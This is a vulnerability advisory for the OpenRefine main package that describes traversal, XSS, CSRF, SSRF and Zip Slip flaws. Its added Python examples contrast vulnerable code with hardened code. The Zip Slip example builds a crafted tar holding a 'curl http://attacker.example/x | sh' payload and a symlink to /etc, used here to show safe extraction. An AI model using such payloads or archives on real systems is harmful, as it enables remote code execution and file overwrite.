org.openrefine:main@3.6-rc1 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the org.openrefine:main package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability Vulnerable Version
  • H (High severity)
Directory Traversal

Affected versions of this package are vulnerable to Directory Traversal via the LoadLanguageCommand component, which does not sanitize the strLang parameter before using it to build a file path. By supplying a strLang value that contains path segments such as ../, an attacker can make the command resolve a path outside the intended translations directory and read arbitrary JSON files on the system.
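The pattern behind this finding, as an added Python illustration that is not OpenRefine's (Java) code: the `BASE_DIR` layout, the `<tag>.json` file naming, the function names and the language-tag allow-list are assumptions. The traversal-prone construction is shown beside a resolver that allow-lists the tag and then checks containment on the fully resolved path, which also catches the absolute-path case where `os.path.join` silently discards the base directory.

```python
import os
import re

# Added illustration of the LoadLanguageCommand finding above; not OpenRefine's code.
# Assumptions: translations live in BASE_DIR as "<tag>.json", and a language tag
# is letters/digits with "-" or "_" separators (a deliberately strict allow-list).
BASE_DIR = os.path.realpath("./translations")
LANG_RE = re.compile(r"^[a-z]{2,3}(?:[-_][A-Za-z0-9]{2,8}){0,3}$")


def vulnerable_path(lang: str) -> str:
    """Traversal-prone: the untrusted tag is concatenated straight into the path."""
    # os.path.join drops BASE_DIR entirely when `lang` is absolute, and "../"
    # segments walk upwards once the path is normalised by the OS.
    return os.path.normpath(os.path.join(BASE_DIR, lang + ".json"))


def safe_path(lang: str) -> str:
    """Hardened: allow-list the tag, then prove the resolved path stays in BASE_DIR."""
    if not LANG_RE.fullmatch(lang):
        raise ValueError(f"rejected language tag {lang!r}")
    candidate = os.path.realpath(os.path.join(BASE_DIR, lang + ".json"))
    # Containment is checked on the fully resolved path, so symlinked
    # components cannot smuggle the file out of the directory either.
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"{candidate} is outside {BASE_DIR}")
    return candidate


def escapes_base(path: str) -> bool:
    """True when a path produced by vulnerable_path() lies outside BASE_DIR."""
    return os.path.commonpath([BASE_DIR, os.path.realpath(path)]) != BASE_DIR


def resolve_or_none(lang: str):
    """What a request handler would call: None means 'reject the request'."""
    try:
        return safe_path(lang)
    except ValueError:
        return None
```

The allow-list does most of the work; the containment check is the second, independent line of defence for the day the allow-list is loosened.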

How to fix Directory Traversal?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M (Medium severity)
Cross-site Scripting (XSS)

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the ExportRowsCommand component: the Content-Type header of the export response is not properly sanitized, so a malicious page can submit a form POST carrying embedded JavaScript and have the browser render the export as HTML on the OpenRefine origin, executing that JavaScript in the user's browser.

Note:

This is only exploitable if the attacker knows a valid project ID of a project that contains at least one row.

How to fix Cross-site Scripting (XSS)?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M (Medium severity)
Cross-site Request Forgery (CSRF)

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via the PreviewExpressionCommand endpoint, which does not validate the CSRF token. An attacker can exploit this by convincing a user to visit a malicious website whose crafted page submits a POST request to that endpoint without the user's knowledge or consent.

Note: This is only exploitable if the attacker knows a valid project ID and the project contains at least one row.
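The two controls whose absence the ExportRowsCommand XSS and the PreviewExpressionCommand CSRF findings describe, as an added Python model that is not OpenRefine's code: the handler names, form field names (`csrf_token`, `format`, `contentType`, `engine`) and the export-format table are assumptions chosen to show the fix, not the real request interface. The weak handler lets the client choose the response Content-Type and checks no token; the hardened one requires a per-session token compared in constant time and derives the Content-Type from a server-side table only.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Added model of the export-rows content-type and missing-CSRF-check findings.
# Not OpenRefine's code: handler names, form fields and the format table are assumptions.

# The server decides the response type from a fixed table keyed by export format.
EXPORT_CONTENT_TYPES = {
    "csv": "text/csv",
    "tsv": "text/tab-separated-values",
    "json": "application/json",
}

Response = Tuple[int, Dict[str, str], str]


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Generate an unguessable per-session token and store it server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: Dict[str, str], supplied: Optional[str]) -> bool:
    """Constant-time comparison against the token stored in the session."""
    expected = session.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def vulnerable_export_rows(form: Dict[str, str], rows: str = "a,b\n1,2\n") -> Response:
    """Model of the weak endpoint: no CSRF check, and the client picks the Content-Type.

    A cross-site form POST with contentType=text/html therefore makes the browser
    render whatever reflected request data ends up in the body as HTML on the
    OpenRefine origin."""
    headers = {"Content-Type": form.get("contentType", "text/csv")}
    body = f"# engine: {form.get('engine', '')}\n{rows}"  # reflected request data (constructed)
    return 200, headers, body


def export_rows(session: Dict[str, str], form: Dict[str, str], rows: str = "a,b\n1,2\n") -> Response:
    """Hardened endpoint: CSRF token required, Content-Type chosen server-side only."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, {"Content-Type": "text/plain"}, "missing or invalid CSRF token"
    fmt = form.get("format", "")
    content_type = EXPORT_CONTENT_TYPES.get(fmt)
    if content_type is None:
        return 400, {"Content-Type": "text/plain"}, "unsupported export format"
    headers = {
        "Content-Type": content_type,
        # Force a download and forbid MIME sniffing so even a CSV full of
        # markup is never interpreted as a page on this origin.
        "Content-Disposition": f'attachment; filename="export.{fmt}"',
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, rows
```

A cross-site page cannot read the token out of the victim's session, so its forged POST fails the first check; even a request that does carry a valid token can no longer pick `text/html` as the response type.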

How to fix Cross-site Request Forgery (CSRF)?

Upgrade org.openrefine:main to version 3.8.3 or higher.

[,3.8.3)
  • M (Medium severity)
Server-side Request Forgery (SSRF)

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF), which allows unauthorized users to make the OpenRefine server issue requests to locations of their choosing, potentially leading to unauthorized access to internal resources and disclosure of sensitive files.

How to fix Server-side Request Forgery (SSRF)?

Upgrade org.openrefine:main to version 3.6.0 or higher.

[,3.6.0)
  • M (Medium severity)
Arbitrary File Write via Archive Extraction (Zip Slip)

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) during project import: entries in a crafted OpenRefine project tar file whose paths traverse outside the extraction directory are written there, which can be used to trigger arbitrary code execution if a user can be convinced to import the file.
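What a Zip Slip entry looks like and how an importer refuses it, as an added Python example that is not OpenRefine's import code: the archive contents (a benign project-like tar and one carrying a `../../.bashrc` member plus a symlink pointing out of the tree) are constructed here, and `/srv/import` is an assumed destination used only for the dry-run audit. The extractor audits every member against the resolved destination before writing anything, refuses links outright, and writes regular files by hand rather than trusting the library's extraction.

```python
import io
import os
import tarfile
import tempfile
from typing import List, Optional, Tuple

# Added example for the Zip Slip finding above; not OpenRefine's import code.
# Archive contents are constructed; "/srv/import" is an assumed audit destination.


def build_tar(members) -> bytes:
    """Build a tar in memory from (name, data, linkname) triples; a linkname makes a symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data, linkname in members:
            info = tarfile.TarInfo(name)
            if linkname is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = linkname
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


BENIGN_TAR = build_tar([
    ("metadata.json", b'{"name": "demo project"}', None),
    ("data/rows.txt", b"a,b\n1,2\n", None),
])

MALICIOUS_TAR = build_tar([
    ("metadata.json", b'{"name": "demo project"}', None),
    ("../../.bashrc", b"curl http://attacker.example/x | sh\n", None),  # Zip Slip path
    ("link", None, "/etc"),                                            # symlink out of the tree
    ("link/passwd", b"pwned\n", None),                                 # would write through it
])


def contained_target(dest: str, name: str) -> str:
    """Resolve a member name under dest and prove it cannot escape."""
    if os.path.isabs(name):
        raise ValueError(f"absolute member name {name!r}")
    target = os.path.realpath(os.path.join(dest, name))
    if os.path.commonpath([dest, target]) != dest:
        raise ValueError(f"member {name!r} escapes {dest}")
    return target


def audit_members(tar_bytes: bytes, dest: str = "/srv/import") -> List[Tuple[str, str]]:
    """Dry run: return (name, reason) for every member that must not be extracted."""
    dest = os.path.realpath(dest)
    rejected = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar:
            try:
                contained_target(dest, m.name)
            except ValueError as exc:
                rejected.append((m.name, str(exc)))
                continue
            if not (m.isreg() or m.isdir()):
                # Links and devices are refused outright: a symlink written first
                # turns later, individually "contained", names into escapes.
                rejected.append((m.name, f"non-regular member type {m.type!r}"))
    return rejected


def safe_extract(tar_bytes: bytes, dest: str) -> List[str]:
    """Extract only after the whole archive passes the audit; regular files are written by hand."""
    dest = os.path.realpath(dest)
    rejected = audit_members(tar_bytes, dest)
    if rejected:
        raise ValueError(f"archive rejected: {rejected}")
    written = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar:
            target = contained_target(dest, m.name)
            if m.isdir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(m) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(m.name)
    return written


def try_extract(tar_bytes: bytes) -> Tuple[List[str], Optional[str]]:
    """Extract into a fresh temp dir; returns (written names, error message or None)."""
    dest = tempfile.mkdtemp(prefix="openrefine-import-")
    try:
        return safe_extract(tar_bytes, dest), None
    except ValueError as exc:
        return [], str(exc)
```

Auditing the whole archive before the first write matters: rejecting members one at a time during extraction still leaves the earlier, already-written files (and any symlink among them) on disk.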

How to fix Arbitrary File Write via Archive Extraction (Zip Slip)?

Upgrade org.openrefine:main to version 3.7.4 or higher.

[,3.7.4)